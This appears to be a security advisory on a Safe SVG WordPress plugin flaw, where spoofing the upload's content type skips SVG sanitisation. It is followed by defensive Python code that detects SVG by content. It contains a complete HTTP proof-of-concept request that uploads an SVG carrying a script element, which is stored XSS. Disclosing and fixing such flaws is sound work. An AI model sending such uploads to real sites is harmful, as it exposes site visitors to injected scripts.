wpexploit - David Hamann - WPEX-ID: 4D12533E-BDB7-411F-BCDF-4C5046DB13F3
History: Mar 25, 2022 - 12:00 a.m.

Safe SVG < 1.9.10 - SVG Sanitisation Bypass

2022-03-25 00:00:00
David Hamann

EPSS: 0.001 (Low), Percentile: 36.9%

The sanitisation step of the plugin can be bypassed by spoofing the content-type in the POST request to upload a file. Exploiting this vulnerability, an attacker will be able to perform the kinds of attacks that this plugin should prevent (mainly XSS, but depending on further use of uploaded SVG files potentially other XML attacks).

POST /wp-admin/async-upload.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------27451310545300823063986174174
Content-Length: 947
Connection: close
Cookie: [user with upload capability]

-----------------------------27451310545300823063986174174
Content-Disposition: form-data; name="name"

xss.svg
-----------------------------27451310545300823063986174174
Content-Disposition: form-data; name="action"

upload-attachment
-----------------------------27451310545300823063986174174
Content-Disposition: form-data; name="_wpnonce"

b281e72731
-----------------------------27451310545300823063986174174
Content-Disposition: form-data; name="async-upload"; filename="xss.svg"
Content-Type: image/png

<?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">alert(/XSS/);</script>
</svg>

-----------------------------27451310545300823063986174174--
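The weakness shown above is that the sanitiser is only triggered by the client-supplied Content-Type. The following added example (not the Safe SVG plugin's code) shows the defensive alternative: decide whether an upload must be sanitised from the declared type, the filename and a sniff of the actual bytes, so a spoofed `image/png` header no longer skips the step. The function and constant names are this example's own; the sample payload is constructed to mirror the PoC body.

```python
"""Content-based SVG detection for an upload gate (illustrative, not the plugin's code)."""
import io
import xml.etree.ElementTree as ET
from typing import Optional

SVG_NS = "http://www.w3.org/2000/svg"


def root_tag(data: bytes) -> Optional[str]:
    """Return the root element name of an XML document, or None if the bytes
    are not well-formed XML. Only the first start tag is parsed; ElementTree
    does not fetch external DTDs, so a DOCTYPE in the upload is harmless here."""
    try:
        for _, elem in ET.iterparse(io.BytesIO(data), events=("start",)):
            return elem.tag  # '{namespace}localname' when a namespace is declared
    except ET.ParseError:
        return None
    return None


def is_svg_content(data: bytes) -> bool:
    """True if the payload is an SVG document, whatever the request claimed it was."""
    return root_tag(data) in ("svg", f"{{{SVG_NS}}}svg")


def needs_svg_sanitisation(content_type: str, filename: str, data: bytes) -> bool:
    """Route the upload to the sanitiser if ANY signal says SVG: the declared
    MIME type, the file extension, or the sniffed content. Relying on the
    declared type alone is the bypass described on this page."""
    declared = content_type.split(";")[0].strip().lower() == "image/svg+xml"
    by_name = filename.lower().endswith((".svg", ".svgz"))
    return declared or by_name or is_svg_content(data)


# Constructed sample mirroring the PoC: SVG bytes sent with Content-Type: image/png.
SPOOFED_SVG = b'''<?xml version="1.0" standalone="no"?>
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">alert(/XSS/);</script>
</svg>'''

if __name__ == "__main__":
    # Both calls return True: the spoofed type is ignored because the bytes are SVG.
    print(needs_svg_sanitisation("image/png", "xss.svg", SPOOFED_SVG))
    print(needs_svg_sanitisation("image/png", "photo.png", SPOOFED_SVG))
```

A real PNG (or any non-XML payload) returns False from `is_svg_content`, so only genuine SVG documents pay the cost of the sanitiser.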
